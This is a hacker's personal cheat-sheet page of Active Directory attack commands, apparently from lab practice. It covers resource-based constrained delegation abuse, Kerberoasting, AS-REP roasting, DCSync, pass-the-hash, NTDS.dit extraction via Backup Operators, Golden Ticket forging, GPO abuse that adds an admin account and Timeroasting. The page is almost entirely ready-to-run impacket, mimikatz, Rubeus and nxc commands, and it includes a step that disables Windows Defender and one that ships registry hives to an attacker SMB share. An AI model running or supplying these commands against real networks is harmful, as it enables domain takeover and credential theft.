rootđź’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

AD attacks-:


Abuse Resource-Based Constrained Delegation to Gain Unauthorized Access


BCD is configured by setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
This attribute specifies which service accounts or systems are permitted to act on behalf of users to access the target resource.
-To exploit this type of delegation, an attacker must gain access to an account with Write permissions on the targeted resource (computer object), such as GenericAll, GenericWrite, and WriteDACL.

image

addcomputer.py -computer-name 'password' -computer-pass 'password' -dc-ip [ip] '[domain]/[username]:[password]'

image

image

python3 rbcd.py 10.10.11.174 -u [domain]\\[user] -p '[password]' -t DC -f [newly created computer]

image

python3 getST.py -spn cifs/[object with unconstrained delegation over] -impersonate [user] -dc-ip [ip] '[domain]/[user]:[password]'

image

image

Syntax-:

KRB5CCNAME=[ccache file name [endswith .ccache] impacket-psexec [domain]/[user]@[object] -k -no-pass

image

impacket-secretsdump -k -target-ip [ip] [domain name]

image

image


Reference



Kerbroasting



Steps(Kerberoasting with GetUserSPNs.py)


image

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

image

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

image

hashcat -m 13100 kerberoasted_sqldev /usr/share/wordlists/rockyou.txt
impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile kerberoasted_sqldev

image

image

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

image

sudo faketime "$(rdate -n <domain-ip)" <binary>
sudo faketime "$(sudo rdate -n 192.168.232.129)"  nxc ldap  192.168.232.129  -u 'stafani.ferdinanda' -p 'ncc1701' --kerberoast kerberoast.hashes

image

AES+PKDF2 ($krb5tgs$17$, $krb5tgs$18$)
RC+NTHASH (etype 23 ($krb5tgs$23$))

Using Windows for kerberoasting( Semi Manual mode)


setspn -Q */*

image

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

image

base64 /out::true
kerberos::list /export

image


Prepping it for cracking


image

image

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' tickets.txt
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

image

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

image

Get-DomainUser * -spn | Get-DomainSPNTicket -Format Hashcat | Export-csv .\powershell.csv -NoTypeInformation

image


Using Rubeus


.\Rubeus.exe kerberoast /stats

image

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

image


Other Encryption Types


.\Rubeus.exe kerberoast /user:testspn /nowrap
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

image

 .\Rubeus.exe kerberoast /user:testspn /nowrap /tgtdeleg

image


ASREP roasting


nxc ldap  192.168.232.129  -u valid_ad_username -p '' --asreproast valid_asrep_roast.txt

image

impacket-GetNPUsers cs.org/ -usersfile valid_ad_username -dc-ip 192.168.232.129 -request -format john

image

image


Pass the ticket


impacket-getTGT -dc-ip 192.168.232.129 'cs.org/stafani.ferdinanda:ncc1701' -debug

image

export KRB5CCNAME=/home/sensei/AD/lab/stafani.ferdinanda.ccache

DCSync Attack


image

impacket-secretsdump  -just-dc mag.bekki:ncc1701@192.168.232.129 -outputfile dcsync_hashes

image

.\mimikatz.exe
lsadump::dcsync /user:Administrator /domain:cs.org
# Only the krbtgt account
secretsdump.py -just-dc-user krbtgt <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>

# Only privileged objects selected through LDAP
secretsdump.py -just-dc-ntlm -ldapfilter '(adminCount=1)' <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>

# Add metadata and password history for cracking/reuse analysis
secretsdump.py -just-dc-ntlm -history -pwd-last-set -user-status <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>

Pass the hash with pth-winexe


impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:57c5a5bc7c0e1f98e9c9d81161e74c44 Administrator@192.168.232.129

image


#Disabling windows real time protection
powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe

image


Sign in with another user


runas /netonly /user:yourdomain\TargetUser cmd.exe

Abusing Users in Backup Operators


image

#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
bash -c "echo -ne 'set context persistent nowriters\nadd volume c: alias raj\ncreate expose %raj% z:' > backup.dsh;unix2dos backup.dsh"

image

#disk shadow to create a shadow copy
diskshadow /s backup.dsh

image

robocopy /b z:\windows\ntds . ntds.dit

image

reg save hklm\system c:\Temp\system
impacket-secretsdump -ntds ntds.dit -system system LOCAL

image

nxc smb 192.168.232.129  -d cs.org -u "stephanie.clara"  -p 'ncc1701' -M backup_operator

image

impacket-smbserver share $(pwd) -smb2support

image

impacket-reg "cs.org"/"stephanie.clara":"password"@"192.168.232.129" backup -o '\\192.168.232.130\share'

image


Grabbing ntds with nxc


nxc smb  10.1.129.131 -d dc01.martini.bars -u 'athena.t0' -p '1dirtymartini' --ntds --user krbtgt

image

A Golden Ticket attack consists of the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM hash of the Active Directory (AD) krbtgt account. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It’s crucial to remember that the krbtgt account’s credentials are never automatically updated.To acquire the NTLM hash of the krbtgt account, various methods can be employed. It can be extracted from the Local Security Authority Subsystem Service (LSASS) process or the NT Directory Services (NTDS.dit) file located on any Domain Controller (DC) within the domain. Furthermore, executing a DCsync attack is another strategy to obtain this NTLM hash, which can be performed using tools such as the lsadump::dcsync module in Mimikatz or the secretsdump.py script by Impacket. It’s important to underscore that to undertake these operations, domain admin privileges or a similar level of access is typically required.[2]

Get-ADDomain | Select-Object -ExpandProperty DomainSID

image

impacket-ticketer -nthash 22ebc290e67668629c8d0812662a9c51  -domain-sid S-1-5-21-3716536509-2861296316-2740169710   -domain dry.martini.bars Administrator

Exploiting Machine quota for user


nxc ldap -u "dev" -p "password" -dc-ip dc01.papa.local -M maq

image

impacket-addcomputer -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'

image


Pre 2k AD configurations


nxc ldap 192.168.130.136 -u "dev" -p "password" -M pre2k

image

image

impacket-changepasswd ignite.local/DEMO$@192.168.1.48 -newpass 'Password@987' -p rpc-samr

image


Exploiting Group Policy Objects


image

pygpoabuse 'papa.local/dev:password' -gpo-id 'AD57560C-6272-4088-892B-C0A7D6D874D9' -command 'net user secret Password123! /add && net localgroup administrators secret /add' -v

image

image


Unconstrained Delegation


impacket-findDelegation 'papa.local/delegation_user'  -dc-ip 192.168.130.136  -hashes aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1

image

addspn -u papa.local\\delegation_user -p 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -s papa.local/delegated_user.papa.local --target-type samname 192.168.130.136

image

pywerview get-netuser -d papa.local -u delegation_user --hashes 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -t 192.168.130.136 --unconstrained

image

python3 dnstool.py -u papa.local\\delegation_user -p 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -r delegated_user.papa.local -a add --allow-multiple -d 192.168.130.132 192.168.130.136

image


Timeroasting


python3 timeroast.py papa.local

image

Import-Module .\Invoke-AuthenticatedTimeRoast.ps1
Invoke-AuthenticatedTimeRoast  -DomainController "dc01.papa.local"

image

hashcat -m 31300 -a 0 -O timeroast_hashes /home/sensei/rockyou.txt --username